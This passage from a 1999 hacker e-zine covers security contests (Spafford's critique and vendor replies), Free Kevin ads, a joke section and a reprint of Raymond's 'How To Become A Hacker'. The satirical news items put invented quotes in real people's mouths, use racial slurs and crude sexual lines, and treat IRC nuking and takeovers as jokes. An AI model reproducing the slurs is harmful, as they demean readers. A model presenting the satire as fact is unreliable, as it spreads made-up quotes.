guarantee that people will analyze the target. Surviving a contest is no guarantee that there are no flaws in the target. The true measure of trustworthiness is how much analysis has been done, not whether there was a contest. And analysis is a slow and painful process. People trust cryptographic algorithms (DES, RSA), protocols (Kerberos), and systems (PGP, IPSec) not because of contests, but because all have been subjected to years (decades, even) of peer review and analysis. And they have been analyzed not because of some elusive prize, but because they were either interesting or widely deployed. The analysis of the fifteen AES candidates is going to take several years. There isn't a prize in the world that's going to make the best cryptanalysts drop what they're doing and examine the offerings of Meganet Corporation or RPK Security Inc., two companies that recently offered cracking prizes. It's much more interesting to find flaws in Java, or Windows NT, or cellular telephone security. The above three reasons are generalizations. There are exceptions, but they are few and far between. The RSA challenges, both their factoring challenges and their symmetric brute-force challenges, are fair and good contests. These contests are successful not because the prize money is an incentive to factor numbers or build brute-force cracking machines, but because researchers are already interested in factoring and brute-force cracking. The contests simply provide a spotlight for what was already an interesting endeavor. The AES contest, although more a competition than a cryptanalysis contest, is also fair Our Twofish cryptanalysis contest offers a $10K prize for the best negative comments on Twofish that aren't written by the authors. There are no arbitrary definitions of what a winning analysis is. There is no ciphertext to break or keys to recover. We are simply rewarding the most successful cryptanalysis research result, whatever it may be and however successful it is (or is not). Again, the contest is fair because 1) the algorithm is completely specified, 2) there are no arbitrary definition of what winning means, and 3) the algorithm is public domain. Contests, if implemented correctly, can provide useful information and reward particular areas of research. But they are not useful metrics to judge security. I can offer $10K to the first person who successfully breaks into my home and steals a book off my shelf. If no one does so before the contest ends, that doesn't mean my home is secure. Maybe no one with any burgling ability heard about my contest. Maybe they were too busy doing other things. Maybe they weren't able to break into my home, but they figured out how to forge the real-estate title to put the property in their name. Maybe they did break into my home, but took a look around and decided to come back when there was something more valuable than a $10,000 prize at stake. The contest proved nothing. SP.C2 Hacker challenges: Boon or Bane by Gene Spafford ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hacker Challenges -- Boon or Bane? (From Cipher, an infowar publication located at http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/old-issues/issue9602 - Ed) Commentary by Gene Spafford, with responses from Sameer Parekh, Jon Wiederspan, and Jeff Weinstein ______________________________________________________________________ In the past year, several businesses have made resources publicly available on the Internet and challenged all comers to find bugs in them or break into them. Incentives offered to those who reported valid break-ins or bugs have ranged from T-shirts to cold cash. Recently, Gene Spafford of Purdue University decried this growing practice in a message circulated widely on the Internet. Cipher has obtained responses from some of the organizations who have sponsored challenges of one sort or another, and circulating them along with that note. We thank Prof. Spafford and the organizations who responded to our request for comments. A Few Comments on "Hacker Challenges" +++++++++++++++++++++++++++++++++++++ by Eugene H. Spafford, COAST Laboratory Director, Purdue University http://www.cs.purdue.edu/people/spaf I note with dismay the increasing number of "hacker challenges" used in marketing security products. I think these are actually harmful to the profession and practice of security, rather than helpful. I believe the harm comes in two ways: (1) the challenges don't serve as any real test of the products, and it denigrates security professionals by suggesting that they should accept them as proof of security; and (2) it helps reinforce the image that there should be some form of reward for hacking through security measures. Neither of these are views we should responsibly seek to promote. Consider the nature of showing the security of a product. Does a "challenge" meet the goal of testing, which is to increase one's confidence in the correct functioning of the artifact? It really doesn't, for a number of reasons: o Few such "challenges" are conducted using established testing techniques. They are ad hoc, random tests. Thus, there is no way of determining final coverage. For instance, if 90% of all challenge attacks are of the same variety, what has the "test" really shown? (Consider testing a calculator. If you perform 10,000 tests, but 9000 of them are addition with zero, have you done a thorough job of testing?) o That no problems are found does not mean that no problems exist. It may mean that the testers didn't expose them. Doing random, black-box testing remotely is not likely to really test much of the product. (Challenge testing is basically a form of black-box testing.) o That no problems are reported does not mean that no problems exist. The "testers" might not have recognized them. (Look at how often software is released with bugs, even after careful scrutiny -- users don't always recognize anomalies.) o That no problems are reported does not mean that no problems exist. How do you know that the "testers" will report what they find? How do you know the vendor is getting accurate data? If Jane Random Hacker found a way to penetrate the product in a manner that vendor monitoring didn't expose, it is possible she'd find more profitable uses (later) for that information than informing the vendor about it. Further, because of possible problems with the law, hackers might not want to report success and draw attention to themselves. o Simply because the vendor does not report a successful penetration does not mean that one did not occur -- the vendor may choose not to report it because it would reflect poorly on its product, or not meet the narrow criteria for a "successful" penetration, or the vendor may not be able to detect it happened. (How can anyone outside prove otherwise?) o Seldom do the really good experts, on either side of the fence, participate in such exercises. Thus, anything done is usually done by amateurs. (The "honor" of having won the challenge is not sufficient to lure the good ones into the fray. Good consultants command fees of several thousand $$ per day in some cases -- why should they donate their time and names for what amounts to free consulting and advertising?) Also note that any such challenge also serves to aid potential hackers in their later pursuits: o It gives potential miscreants some period to practice breaking the system without penalty. Any other time spent hacking at one of these might result in legal action or worse. Isn't it nice the vendor is giving free practice time to the bad guys? I hope all the potential customers are equally pleased at this. o It gives miscreants an excuse if they are caught trying to break into the system later (e.g., "We thought the contest was still on.") This might well weaken any legal action taken later. o The vendor contest may actually even include some publication of hacks that don't work -- thus helping reduce the effort to compromise the system later. Furthermore, the whole process sends the wrong message -- that we should build things and then try to break them, or that there is some prestige or glory in breaking systems. That isn't what we need. Instead, we want to promote responsible behavior, using established methods. We need to establish that security is something best done by well-trained professionals, and that hacking into systems is not "job training". (I've argued this point in more detail in "Are Computer Break-Ins Ethical?", Journal of Systems and Software, Jan 1992, 17(1).) Good security should be carefully designed in and tested using established methods. Tiger teams have a role, but using them (especially ad hoc teams) as a major means of establishing safety is negligent. Security "contests" to demonstrate a system are worse, and should be viewed negatively by potential customers. It should be generally recognized that such contests cannot establish more than cursory confidence in a product, are not a good means of testing, and actually create a climate that may encourage or enable people to try to break the product after it is in use. If I was a potential customer of any security product, which of the following, somewhat exaggerated approaches would be more likely to convince me that a company had its act together? Which one is the company more likely to be seeking to sell based on smoke and mirrors? o Approach A: Our product was coded by a bunch of really talented hackers and former system crackers who learned everything they know on the IRC. We put our product up on the Internet for 6 months, and offered a nifty backpack and some money to anyone who could break in. No one claimed the prize. Obviously, ours is a superior product. o Approach B: Our company is certified as an ISO 9000 company. We used formal software engineering approaches to design and build our product, ending in full functional testing, D-U path testing, and statement coverage to 98%. We also hired well-known independent security experts A, B, and C under non-disclosure to examine the code and identify weaknesses, and then conduct field trials. Company X and University Y have also had the opportunity to examine and test our product, and none of them have found flaws. Approach "B" is clearly the one we want to encourage. Approach "A" encourages cycles of "penetrate and patch" and that is what is wrong with most mass-market software available today. However, vendors claim that Approach "A" is what sells more product than Approach "B," in part because it seems to inspire more confidence, and in part because it is cheaper to produce software if they don't use an approach like "B". If we, as a community and a profession, want better quality and more trustworthy products, we must begin to demonstrate it. The best way is in the marketplace, by showing a willingness to buy based on substance, and not flash. Saying "no" to attempts to sell us products based on "hacker challenges" is one way to do that. Replies: ++++++++ Sameer Parekh, Community ConneXion, (sameer@c2.org URL:http://www.c2.org/): Most of Gene's points are very valid, and I agree with them. His points are aimed at challenges promoted by a company in order to show that a product is secure. On the other hand, the Community ConneXion challenges are promoted in order to show that a product is *insecure*. It's easy to prove insecurity, but hard to prove security. The vendor-supported challenges are trying to prove security, which is rather misguided. In proving insecurity though, our challenges are rather simple, as they only require one counter-example to be proven that a system is insecure. - - - - - - - Jon Wiederspan, ComVista (jon@comvista.com URL: http://www.comvista.com/) : We received a very similar letter from Mr. Spafford when we first began our contest and posted an extensive reply on our site while it was in operation. I will summarize the main points for Cipher readers: 1) Mr. Spafford says that these challenges are a poor way of testing software. That is true, however it was never our purpose to test the software by running a challenge. The testing has been completed or we would not have been confident enough to place $10,000 on the line. The main purpose of our security challenge was to promote awareness of the existence of security options for Macintosh servers. It was never intended as proof of the security of the system or to replace rigorous testing. 2) Mr. Spafford says that these contests promote hacking. We disagree with that entirely. By his argument, the Daytona 500 is responsible for people driving too fast on highways. I think there are people who drive as if they are on a race track (one passed me this morning on my way to work) but it is clear that rules on the highway are different from rules on the race track and no court in the land would let a person get away with arguing differently. We clearly stated on our site the limitations of the contest including a warning that we were not condoning similar attacks on systems other than the one provided for the contest. 3) Mr. Spafford says that these contests make it easier to break other systems. Mr. Spafford is looking in the wrong place. Bulletin boards, newsletters, Web sites and more all exist with information on how to hack into systems. Books have been written on the subject, movies made, and special investigative reports offered on television all on the subject. Writing about what failed on our site will not help hackers significantly. Our site also did not provide free practice to hackers because *none of the attempts worked*. Practice is useless if you do not at some point succeed. 4) Mr. Spafford says that it is wrong to test things by trying to break them. I don't think he thought about what he was saying there. What is beta testing but an attempt to find where software will break? Stress testing for metal structures? Crash testing cars? It is a fact of life that part of testing a product is to find where it will fail, which means trying actively to break the product in a variety of ways. In summary, it is our opinion that Mr. Spafford's letter has no bearing on the challenge that we had online. He probably would have been better served by investigating our site more thoroughly before writing the letter. - - - - - - Jeff Weinstein, Netscape (jsw@netscape.com, URL: http://home.netscape.com/people/jsw) My quick reaction is that the Netscape Bugs Bounty is not a "hacker challenge". It is a way to reward users for helping to find bugs that get past us. I don't think that we make any claims such as "our product must be secure because no one claimed our hacker prize". We also don't view the bug bounty as a replacement for our own QA efforts, but a supplement to it. - - - - - - Secure Computing Corporation, sponsors of the Sidewinder challenge reported in Cipher EI#6, declined to comment. AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't be happy, worry. IRC Security: Who to Trust Contributed by siko Thursday - March 25, 1999. 02:35AM GMT These days the IRC waters can be just as dangerous as a raging inferno. Op the wrong nick and you could lose an entire channel in a matter of seconds. "Anyone can download a script these days and deop the regular channel members these days. The old days you had to load up telnet.exe, these days you type /hack and you are good to go.", says IRC Security Expert Mark Winters. "If you are really skilled, you could even do what is known as 'riding a split'". Certain IRC Networks are not prone to this type of hostile attack, such as Dalnet and Undernet due to channel bots employed by the IRC network to prevent such actions. The only trade off in the matter is Dalnet and Undernet fucking blow. A recent example of a hostile takeover would include a short takeover of #wsvw1u, thought to be masterminded by 'vize' of Efnet. Vize held ops in the channel for several minutes while attempting to harass and threaten Innerpulse writer siko. Siko did not fret, however, since he noticed ops had been restored during the trash talk session vize was putting on. Upon being banned from #wsvw1u, vize entered #innerpulse, which was at the time opless to hurt the self-respect level of channel members by calling them 'lame.'. This highly original insult offended one member so much, he opened a windows nuker and proceded to nuke vize 8 times before finally parting the channel with the message "you will all be owned" (not in those letters... y0u w1ll 4ll b3 0wned). What type of prevention are IRCOps on Efnet taking to stop hostile channel takeover artists like this one? Innerpulse contacted #us-opers and asked for answers. "It is believed that users are responsible for their own channels and their channels well being," said Disciple. After several minutes, Innerpulse learned Disciple was not an IRCOp and stopped giving a shit about his opinions. Efnet Information Ma$e Signs Deal With CDNow.com Contributed by siko Thursday - March 25, 1999. 01:46AM GMT Bad Boy rap artist, Ma$e, has signed a deal with CDNow.com to write and perform music aimed at Internet technologies. They will be compiled and released under the upcoming album 'Internet World', second to his platinum album, 'Harlem World'. "I was excited about the offer because sometimes I'm just kickin it with my homies on IRC and I get these ideas. I plan to rap about the trials and tribulations brought on by the Internet, including taking channels on IRC, packeting AntiOnline, playing all the ladies on America Online, among other things.", said Ma$e yesterday at an official press conference. "Hopefully this will let the world know about the struggles that exist on todays Internet." Ma$e's first song that he has started production on in the studio is called 'Lookin at Me'. He shows off his lyrical prowess with lines such as 'Soon as I join the channel people is like damn who is he, and please, I hope he don't nuke me'. Another verse taking aim at 'lamers' goes: "And if you are a lamer, and you got a net girlie, don't be real committed, because Ma$e will net-bang her.". Staying true to the game, there are several skits included on the cd. Among the planned skits are Ma$e accidentally messing up his AOL Instant Messages and telling Shania he will meet her at 7pm when he meant to send the Instant Message to Faruka, a real black queen. Ma$e describes his everyday troubles waking up and signing on in his song 'Niggaz Wanna DoS'. Ma$e shows he is a lyrical soldier with lines such as 'You wanna fuck with Ma$e, you'll get your wig rocked nigga, You wanna fuck with Innerpulse, You'll get your IP nuked nigga.". The album should be out in late July, 1999. Doonesbury Author Reveals Source of Information Contributed by siko Wednesday - March 24, 1999. 09:11PM GMT Doonesbury is a well known comic strip that runs in thousands of publications nationwide. The past couple strips run have included jargon from the cyberculture underground, such as script kiddie and newbie. What started as a portal to the public has swiftly turned into a mess. "In an effort to show off my computer skills, I used the expert term 'tracing the exploit to his isp number'", said G.B Trudea, the writer of Doonesbury. "But I guess after my latest strip its kind of hard to hide the fact that I figured this out in #rootworm of Undernet.". "He wanted to know about computer crimes so he could showcase them in this weeks strip. So basically I just told him everything I knew", said one hacker who goes by the handle 'vortek'. "I think its cool the public will understand what goes on behind the scenes. I mean, attention is the ultimate goal of a 13 year old abused child.." Innerpulse, although never a fan of Doonesbury in the past, has seen computer related material in Doonesbury before. Images portraying long nose, bony face geeks with glasses working hard at their computer 'hacking' is nothing new to the strip. What is new to the strip, is the legal action being brought against it by AntiOnline.com for its illegal use of the term "exploit", a term they believe they own rights to. Doonesbury Comic Innerpulse Could 'Use more food' at the Office Contributed by siko Wednesday - March 24, 1999. 08:00AM GMT Innerpulse Media has decided to search for a second sponsor in hopes of making a small profit to buy food for needy children. You can keep Innerpulse.com running by clicking the banner on the page. Thank you, and look for the new Innerpulse, dubbed the Innerpulse Network, coming January 16.. I mean 3 months later (just like antionline). http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440 NATO authorizes airstrikes on hackers Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for NATO strikes. Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any moment against strategic hacker targets after yet another embarrassing vandalism of a U.S. Department of Defense website. "This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old student in the controversial Computer Science department at the Massachusetts Institute of Technology. "If they want to bomb us, they should do it now so I can get back to cracking Afterlife II." Graphics illegally uploaded to an Associated Press website accompanied a note which stated, "F1n1$h 7h1Z 60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs un173!" The web server was quickly downed in a flurry of flamewars over the proper use of the word 'hacker' versus 'cracker' in the page. Many college-age hackers stayed home rather than attending school, though most admit they would have stayed home anyway. Y2K websites issued detailed FAQs to threatened hackers in case of bombing, including information on how long canned goods stay fresh in underground shelters, how to fix a misfiring diesel generator, and how to sow grain in the field with a plow and oxen. Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the last NATO threat in August, when the alliance previously announced its intention to launch airstrikes at the notorious hacker group Cult of the Dead Cow. Most shelters have been turned into underground bunkers featuring ISDN lines with triple-redundancy backups, as once the hackers moved in, they found the absence of sunlight and social involvement enjoyable. Despite the danger, supporters of hard-line hackers were defiant. "NATOns will fire their missiles from a distance," said Lord Kreel, an NT cracker. "Meanwhile, I will be cracking into the Pentagon with my friends in the Lackeys of Terror. We plan to install Windows on all of their computers, which will cripple their systems beyond repair." Opponents of "black hat" hacking think NATO strikes will actually increase the popularity of cracking among the techno-elite, but cement the popular image of the hacker as a no-good techie pirate bent on stealing credit card numbers and eating babies. "Now, [crackers will] attack all the media sites, plastering the entire web with links to porno and warez sites, and lag the whole net to hell", said hacker Frodo Majere. "If NATO thinks they will bend hackers with bombs, they are dead wrong." Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been preparing to strike at well-known pro-NATO companies and military organizations as soon as the first NATO bomb lands on hacker territory. "We'll introduce Y2K bugs to systems where you'll never find them. We will end the disgusting greed-infested system of monopolist capitalism by freeing information forever. Linux is the One, True God," said one hacker, before he was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux" headband, symbol of the underground terrorist organization FSF. A press release issued by the FSF's guerilla leader, known only as RMS, claimed responsibility for the killing. NATO's secretary-general Javler Selena authorized airstrikes against known hacker sites on Tuesday, after hackers on the IRC channel #2600 rebuffed a last-ditch peace offer and gave out free root accounts on the whitehouse.gov server. "In the past, computer security was a war of escalation between system administrators and joy-riding hackers," said a spokesperson for the anti-hacker group Freedom Through Oppression. "It's high time we brought the war to the instigators and bombed these hacker scum back to the Stone Age. To make the Internet safe for everyone, we must squash dissension once and for all. Countries have been nuked for less." "If you don't stand up to the theft of intellectual property of innocent companies such as SysMicrosoft and AppMicrosoft, you threaten American competitiveness and the ability to innovate," said President Gates, as he sought -- and got -- support from congressional leaders for military action. "We must halt the hackers and save the Internet for our children and the future of our country. The dirty, despicable hackers will no longer disrupt websites to make fun of our institutions, or pollute the Information Superhighway with filthy swear words," said former Vice President Al Gore, founder of the Internet, before he suddenly toppled over and dumped core. "NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe 006383dhX00029393." Posted on Fri 26 Mar 00:21:38 1999 GMT Written by Potato Puzzle: ~~~~~~ How far apart are these two network cards? ---------------------| |----------------------- | | | | | card1 [=]-- coax --[=] card2 | | | - | - | | -------IIIIIIIIIIIIII| - \/ - |IIIIIIIIIIIIIIII------- Hints: The connectors do not count the answer is in inches yes it is a 'trick' question yes they are network cards it is coaxial ethernet 10Mb/s the drop in the loop is 25' @HWA HOW.TO How to hack part 3 ~~~~~~~~~~~~~~~~~~ To be continued (probably) in a future issue... if time permits and inclination is prevelant. ie: if & when I feel like it.. :p Meanwhile read this: http://www.nmrc.org/faqs/hackfaq/hackfaq.html And especially, this: http://www.tuxedo.org/~esr/faqs/hacker-howto.html (published below in its entirety due to relevence and elequence)... $Date: 1999/03/26 09:18:00 $ ( Translations into: French Spanish Italian German Japanese Korean Swedish Portuguese Russian available at site) How To Become A Hacker Why This Document? As editor of the Jargon File, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizard hacker?". Oddly enough there don't seem to be any FAQs or Web documents that address this vital question, so here's mine. If you are reading a snapshot of this document offline, the current version lives at http://www.tuxedo.org/~esr/faqs/hacker-howto.html. What Is A Hacker? The Jargon File contains a bunch of definitions of the term `hacker', most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant. There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term `hacker'. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker. The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music -- actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them "hackers" too -- and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term `hacker'. There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people `crackers' and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word `hacker' to describe crackers; this irritates real hackers no end. The basic difference is this: hackers build things, crackers break them. If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers. The Hacker Attitude Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you -- for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters -- not just intellectually but emotionally as well. So, if you want to be a hacker, repeat the following things until you believe them: 1. The world is full of fascinating problems waiting to be solved. Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. (You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done.) 2. Nobody should ever have to solve a problem twice. Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's consistent to use your hacking skills to support a family or even get rich, as long as you don't forget you're a hacker while you're doing it.) 3. Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers). (There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into boredom.) 4. Freedom is good. Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers. (This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like `cooperation' that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief. 5. Attitude is no substitute for competence. To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence -- especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's vital to becoming a hacker. Basic Hacking Skills The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one. This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following: 1. Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. But be aware that you won't reach the skill level of a hacker or even merely a programmer if you only know one language -- you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to have gotten to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages. If you get into serious programming, you will have to learn C, the core language of Unix (though it's not the one to try learning first thing). Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. LISP is worth learning for the profound enlightenment experience you will have when you finally get it; that experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. It's best, actually, to learn all four of these (Python, C, Perl, and LISP). Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways. I can't give complete instructions on how to learn to program here -- it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of the best hackers are self-taught). What will do it is (a) reading code and (b) writing code. Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models. Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic... 2. Get one of the open-source Unixes and learn to use and run it. I'm assuming you have a personal computer or can get access to one (these kids today have it so easy :-)). The single most important step any newbie can take towards acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it. Yes, there are other operating systems in the world besides Unix. But they're distributed in binary -- you can't read the code, and you can't modify it. Trying to learn to hack on a DOS or Windows machine or under MacOS is like trying to learn to dance while wearing a body cast. Besides, Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding it. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.) So, bring up a Unix -- I like Linux myself but there are other ways (and yes, you can run both Linux and DOS/Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, Lisp, Python, and Perl) than any Microsoft operating system can dream of, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker. For more about learning Unix, see The Loginataka. To get your hands on a Linux, see the Where can I get Linux. 3. Learn how to use the World Wide Web and write HTML. Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit is changing the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web. This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge -- very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page). To be worthwhile, your page must have content -- it must be interesting and/or useful to other hackers. And that brings us to the next topic... Status in the Hacker Culture Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge. Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (now gradually decaying but still potent) against admitting that ego or external validation are involved in one's motivation at all. Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill. There are basically five kinds of things you can do to be respected by hackers: 1. Write open-source software. The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources to the whole hacker culture to use. (We used to call these works ``free software'', but this confused too many people who weren't sure exactly what ``free'' was supposed to mean. Many of us now prefer the term ``open-source'' software). Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them. 2. Help test and debug open-source software They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance. If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on. 3. Publish useful information. Another good thing is to collect and 